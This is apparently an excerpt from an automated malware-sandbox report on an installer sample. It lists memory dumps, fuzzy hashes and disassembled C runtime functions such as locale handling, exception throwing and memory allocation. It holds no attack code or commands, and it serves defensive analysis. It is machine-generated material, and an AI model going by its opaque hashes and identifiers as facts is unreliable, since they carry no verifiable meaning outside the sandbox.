                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                  • Instruction ID: e225c87e34f2507c5826ea54012c799d6fcaf831b6eac19e571eb81dbfb24f10
                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                  • Instruction Fuzzy Hash: 33B16F33D2A5F2498B35862E042863FEE626EC1B4573FC395DCE43F58EC2266E1596D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c736c68679d63215ae1b76ab6bae350f8eb7a0f25796de6a5ca645e5e749590
                  • Instruction ID: c248c2060dad9b756d49a3b4517b54aa84061b1db8eb34f3c35aca373b1ee524
                  • Opcode Fuzzy Hash: 0c736c68679d63215ae1b76ab6bae350f8eb7a0f25796de6a5ca645e5e749590
                  • Instruction Fuzzy Hash: 74917D70E00209CFDF54CFA9C9957EDBBF2AF88314F248529E458A7294EB749885CF85
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                  • Instruction ID: e6d0bdc94e8beaf472476f7ff25621277d7c2424c3227616cfe6e9ccaf7db35d
                  • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                  • Instruction Fuzzy Hash: 19F03932200208AFCF15CF49D851DAA77F9EF08220F0D4069FD09DB221E331EE209B90
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6fb45be82188af8a46939ca6e24c00f0b6ec268c9134e186b086aeb6c8041f0b
                  • Instruction ID: 76b01cb89fb010655e4dd9fb6166a72dd503b0ff14d8381b903c8afe17a59439
                  • Opcode Fuzzy Hash: 6fb45be82188af8a46939ca6e24c00f0b6ec268c9134e186b086aeb6c8041f0b
                  • Instruction Fuzzy Hash: BED012B1C0431CAB8F14EFED58410ADFBFCFA05210F80C2EED80CA3342D23112204685
                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00C2646E), ref: 00C29F41
                  • __mtterm.LIBCMT ref: 00C29F4D
                    • Part of subcall function 00C29C86: DecodePointer.KERNEL32(00000002,00C2A0AF,?,00C2646E), ref: 00C29C97
                    • Part of subcall function 00C29C86: TlsFree.KERNEL32(00000002,00C2A0AF,?,00C2646E), ref: 00C29CB1
                    • Part of subcall function 00C29C86: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00C2A0AF,?,00C2646E), ref: 00C2BC84
                    • Part of subcall function 00C29C86: _free.LIBCMT ref: 00C2BC87
                    • Part of subcall function 00C29C86: DeleteCriticalSection.KERNEL32(00000002,76EF5810,?,00C2A0AF,?,00C2646E), ref: 00C2BCAE
                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C29F63
                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C29F70
                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C29F7D
                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C29F8A
                  • TlsAlloc.KERNEL32(?,00C2646E), ref: 00C29FDA
                  • TlsSetValue.KERNEL32(00000000,?,00C2646E), ref: 00C29FF5
                  • __init_pointers.LIBCMT ref: 00C29FFF
                  • EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A010
                  • EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A01D
                  • EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A02A
                  • EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A037
                  • DecodePointer.KERNEL32(00C29E0A,?,00C2646E), ref: 00C2A058
                  • __calloc_crt.LIBCMT ref: 00C2A06D
                  • DecodePointer.KERNEL32(00000000,?,00C2646E), ref: 00C2A087
                  • GetCurrentThreadId.KERNEL32 ref: 00C2A099
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                  • API String ID: 3698121176-3819984048
                  • Opcode ID: 338261cd0384b4c0ee77c060dddb9cfeb3e8d485738b63929eb933ed930cb8f7
                  • Instruction ID: bc4c12a366dcb0e7a0e84717d8003cf8f1bd1d8c382c395d231e479b934991fc
                  • Opcode Fuzzy Hash: 338261cd0384b4c0ee77c060dddb9cfeb3e8d485738b63929eb933ed930cb8f7
                  • Instruction Fuzzy Hash: AF313C31D242209ADB19BBB5BD19B1DBBE0FB4A360B14093FE455D26F0DB718842DF52
                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00C21524
                    • Part of subcall function 00C24F36: RaiseException.KERNEL32(?,?,00C215D7,?,?,?,?,?,00C215D7,?,00C3CBC4,00000000), ref: 00C24F78
                  • std::exception::exception.LIBCMT ref: 00C21548
                  • __CxxThrowException@8.LIBCMT ref: 00C21563
                  • std::exception::exception.LIBCMT ref: 00C21582
                  • __CxxThrowException@8.LIBCMT ref: 00C2159D
                  • std::exception::exception.LIBCMT ref: 00C215B7
                  • __CxxThrowException@8.LIBCMT ref: 00C215D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 4237746311-1866435925
                  • Opcode ID: 19b7d998f9366bc81b1aabc35ace4f87e3f72b213990f808bef671b4ba74fc7b
                  • Instruction ID: 440c11abe12901c3e8877cf0fa45d5a951c3c4e50e207524cdf7f8f53e31dfbd
                  • Opcode Fuzzy Hash: 19b7d998f9366bc81b1aabc35ace4f87e3f72b213990f808bef671b4ba74fc7b
                  • Instruction Fuzzy Hash: 2F2192B2820218ABCB04EFD8D542AEEB7F8AF94714F24C059F91577641DBB05B04CF62
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C228D3
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C228F6
                  • std::bad_exception::bad_exception.LIBCMT ref: 00C2297A
                  • __CxxThrowException@8.LIBCMT ref: 00C22988
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C2299B
                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00C229B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                  • String ID: bad cast
                  • API String ID: 2427920155-3145022300
                  • Opcode ID: 8086e4e195fae476e7a835aaf9551783cb07612f0c5b935a4c9e2d113ee51be0
                  • Instruction ID: 435761d009b6570237fe72e8cdb9f20cb2709b2f57f858b1fceb12043e6dd946
                  • Opcode Fuzzy Hash: 8086e4e195fae476e7a835aaf9551783cb07612f0c5b935a4c9e2d113ee51be0
                  • Instruction Fuzzy Hash: A131E731D10225AFCB14EF54E981BAE7774FF15720F00066DE926A7AE1DB30AE46CB91
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C22253
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C22276
                  • std::bad_exception::bad_exception.LIBCMT ref: 00C222FA
                  • __CxxThrowException@8.LIBCMT ref: 00C22308
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C2231B
                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00C22335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                  • String ID: bad cast
                  • API String ID: 2427920155-3145022300
                  • Opcode ID: dccd939354505f9977194d0425e5db18de5ea85a09ab97c6d65e15fce5c9b341
                  • Instruction ID: 841e2aed4ed81d26b1a575d881a4d986fd4dfc343e899badd4398eb687d78057
                  • Opcode Fuzzy Hash: dccd939354505f9977194d0425e5db18de5ea85a09ab97c6d65e15fce5c9b341
                  • Instruction Fuzzy Hash: 3131D235900264EBCB14DF54E981BAE7774EB15730F10066DF822A7AA1DB35AE02CBD1
                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00C3D4B8,00000008,00C29DCB,00000000,00000000,?,?,00C2AF44,00C24EA2,?,?,00C24762,?,?,00C21021), ref: 00C29CD4
                  • __lock.LIBCMT ref: 00C29D08
                    • Part of subcall function 00C2BD97: __mtinitlocknum.LIBCMT ref: 00C2BDAD
                    • Part of subcall function 00C2BD97: __amsg_exit.LIBCMT ref: 00C2BDB9
                    • Part of subcall function 00C2BD97: EnterCriticalSection.KERNEL32(00000000,00000000,?,00C29D0D,0000000D), ref: 00C2BDC1
                  • InterlockedIncrement.KERNEL32(?), ref: 00C29D15
                  • __lock.LIBCMT ref: 00C29D29
                  • ___addlocaleref.LIBCMT ref: 00C29D47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                  • String ID: KERNEL32.DLL
                  • API String ID: 637971194-2576044830
                  • Opcode ID: c735385640457c8f815c26c2a3c4125bbb72084ae86adacb3d7760617607a2bc
                  • Instruction ID: 034a65f2e4cc3a264e6cda1d2ac64427079bbc5b00a6ab1652becb3c440ab60d
                  • Opcode Fuzzy Hash: c735385640457c8f815c26c2a3c4125bbb72084ae86adacb3d7760617607a2bc
                  • Instruction Fuzzy Hash: 1D012D71814B10DFD720DF69E945749BBF0EF54320F10890EE49A96AA1CBB4AA44EF15
                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 00C283CB
                    • Part of subcall function 00C2526C: __getptd.LIBCMT ref: 00C2527A
                    • Part of subcall function 00C2526C: __getptd.LIBCMT ref: 00C25288
                  • __getptd.LIBCMT ref: 00C283D5
                    • Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
                    • Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00
                  • __getptd.LIBCMT ref: 00C283E3
                  • __getptd.LIBCMT ref: 00C283F1
                  • __getptd.LIBCMT ref: 00C283FC
                  • _CallCatchBlock2.LIBCMT ref: 00C28422
                    • Part of subcall function 00C25311: __CallSettingFrame@12.LIBCMT ref: 00C2535D
                    • Part of subcall function 00C284C9: __getptd.LIBCMT ref: 00C284D8
                    • Part of subcall function 00C284C9: __getptd.LIBCMT ref: 00C284E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: 399aa04776b09befb045d8584b21a1aaec86976540d9cc59056532279d47a868
                  • Instruction ID: 21bd07aad59b0ca29b9bdc32e49226fe810f80584e4f561467346728d3136856
                  • Opcode Fuzzy Hash: 399aa04776b09befb045d8584b21a1aaec86976540d9cc59056532279d47a868
                  • Instruction Fuzzy Hash: 5111D7B1C00219DFDB00EFA4E986AAE7BB0FF04314F508469F815AB652DB789A15AF51
                  APIs
                  • __getptd.LIBCMT ref: 00C2D810
                    • Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
                    • Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00
                  • __amsg_exit.LIBCMT ref: 00C2D830
                  • __lock.LIBCMT ref: 00C2D840
                  • InterlockedDecrement.KERNEL32(?), ref: 00C2D85D
                  • _free.LIBCMT ref: 00C2D870
                  • InterlockedIncrement.KERNEL32(01981660), ref: 00C2D888
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                  • String ID:
                  • API String ID: 3470314060-0
                  • Opcode ID: 7bf7b360e9d78f7b3d30c1d880817e7cec0a7822be63a258920d5c3dbd74819f
                  • Instruction ID: a405ff2c6fdd387d9ad8dc49a6b8b6e1b1319c40eace4c4ad14c9445f295431c
                  • Opcode Fuzzy Hash: 7bf7b360e9d78f7b3d30c1d880817e7cec0a7822be63a258920d5c3dbd74819f
                  • Instruction Fuzzy Hash: 9901F532D01731ABEB21AF78B44A78D7760BF14760F040018F826A7AD4CB749E81EBD2
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00C21D55
                  • std::exception::exception.LIBCMT ref: 00C21D8E
                    • Part of subcall function 00C2476D: std::exception::_Copy_str.LIBCMT ref: 00C24788
                  • __CxxThrowException@8.LIBCMT ref: 00C21DA3
                    • Part of subcall function 00C24F36: RaiseException.KERNEL32(?,?,00C215D7,?,?,?,?,?,00C215D7,?,00C3CBC4,00000000), ref: 00C24F78
                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C21DAA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                  • String ID: bad locale name
                  • API String ID: 73090415-1405518554
                  • Opcode ID: f84618c11cdc7b56cf6dca1cebb0d79f9edca8b2daddaf7938dab24f58ec0db3
                  • Instruction ID: 239ce9249720f1f25aede7d419506bb0ff5bd32b6f4cf7cd3d5a7e13ce12f1ad
                  • Opcode Fuzzy Hash: f84618c11cdc7b56cf6dca1cebb0d79f9edca8b2daddaf7938dab24f58ec0db3
                  • Instruction Fuzzy Hash: 3D1182B1904B94EFC721DF99D880A9EFBB8FB15700F40866EE45993A41C7745A08CBE5
                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 00C28763
                    • Part of subcall function 00C286BE: ___BuildCatchObjectHelper.LIBCMT ref: 00C286F4
                  • _UnwindNestedFrames.LIBCMT ref: 00C2877A
                  • ___FrameUnwindToState.LIBCMT ref: 00C28788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: csm$csm
                  • API String ID: 2163707966-3733052814
                  • Opcode ID: dd0ddcecc8c39347312c9988e3fa7ae7b2ad8c3dad9afd14d6f73e96c4cd7903
                  • Instruction ID: da93cfb30fcd70f0e3151ae6ba7c56cec67b245003270fa2d4f568f089840431
                  • Opcode Fuzzy Hash: dd0ddcecc8c39347312c9988e3fa7ae7b2ad8c3dad9afd14d6f73e96c4cd7903
                  • Instruction Fuzzy Hash: A4014631002129BBDF22AF51EC85EAA7F6AFF08790F104010FC1814921DB3299B5EBA0
                  APIs
                  • _malloc.LIBCMT ref: 00C2E456
                    • Part of subcall function 00C27CB1: __FF_MSGBANNER.LIBCMT ref: 00C27CCA
                    • Part of subcall function 00C27CB1: __NMSG_WRITE.LIBCMT ref: 00C27CD1
                    • Part of subcall function 00C27CB1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00C26DD9,00000000,00000001,00000000,?,00C2BD22,00000018,00C3D5A8,0000000C,00C2BDB2), ref: 00C27CF6
                  • _free.LIBCMT ref: 00C2E469
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: AllocateHeap_free_malloc
                  • String ID:
                  • API String ID: 1020059152-0
                  • Opcode ID: ea0449aa2056cf1685f300283561b8385da394829fbf8a3c4757add8962c0a65
                  • Instruction ID: 2bb35edd56821c3557502f1318d69e5ad21d4bb713d559200e7807b83f9b952a
                  • Opcode Fuzzy Hash: ea0449aa2056cf1685f300283561b8385da394829fbf8a3c4757add8962c0a65
                  • Instruction Fuzzy Hash: 0D110632804331ABCB253BF5BC05B5E3B95EF443B0B218426F858ABE90DF34894197A1
                  APIs
                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C21DF8
                    • Part of subcall function 00C23E2C: _setlocale.LIBCMT ref: 00C23E3E
                  • _free.LIBCMT ref: 00C21E0A
                    • Part of subcall function 00C24E7C: HeapFree.KERNEL32(00000000,00000000,?,00C24762,?,?,00C21021), ref: 00C24E92
                    • Part of subcall function 00C24E7C: GetLastError.KERNEL32(?,?,00C24762,?,?,00C21021), ref: 00C24EA4
                  • _free.LIBCMT ref: 00C21E1D
                  • _free.LIBCMT ref: 00C21E30
                  • _free.LIBCMT ref: 00C21E43
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                  • String ID:
                  • API String ID: 3515823920-0
                  • Opcode ID: 6b5474d43025e7aebc8bff2b4e1ccaf888302f002724721b59419e6cdfccca36
                  • Instruction ID: 54c4896d92e64e9d8e653d3b5bedf3a7c810d0deb97406a279b8608f585c24e1
                  • Opcode Fuzzy Hash: 6b5474d43025e7aebc8bff2b4e1ccaf888302f002724721b59419e6cdfccca36
                  • Instruction Fuzzy Hash: CD11C2F1900A50ABD620DF5DEC05A1BF7ECEF55B20F194B2AE426C3A40D775EA048A91
                  APIs
                  • __getptd.LIBCMT ref: 00C2DF91
                    • Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
                    • Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00
                  • __getptd.LIBCMT ref: 00C2DFA8
                  • __amsg_exit.LIBCMT ref: 00C2DFB6
                  • __lock.LIBCMT ref: 00C2DFC6
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00C2DFDA
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                  • String ID:
                  • API String ID: 938513278-0
                  • Opcode ID: e00da2e365657be13984e89775775c3156bd254c932271ba134edd688088ac32
                  • Instruction ID: f0f373c12dab08858aa85387e989b7899a2f972ff491f93771fd54fe98b10c7f
                  • Opcode Fuzzy Hash: e00da2e365657be13984e89775775c3156bd254c932271ba134edd688088ac32
                  • Instruction Fuzzy Hash: A5F090329447309FD621BBE8B903B4E77A0AF10720F504109F413A79C2CB745940AA9A
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: _fgetc
                  • String ID:
                  • API String ID: 762172173-0
                  • Opcode ID: 1324d2b10be6d79e8796775e16f446d67da5838a955e6d4d844af34f36f80971
                  • Instruction ID: fe213fc5615931373873882f5f4a0d2d94326646e48827a887c804db60aa2690
                  • Opcode Fuzzy Hash: 1324d2b10be6d79e8796775e16f446d67da5838a955e6d4d844af34f36f80971
                  • Instruction Fuzzy Hash: 26717571901628AFCB24CF9CE980AAEF3F5FF49310F104A59E856A7B80D735AE05CB50
                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C34129
                  • __isleadbyte_l.LIBCMT ref: 00C3415C
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?), ref: 00C3418D
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?), ref: 00C341FB
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
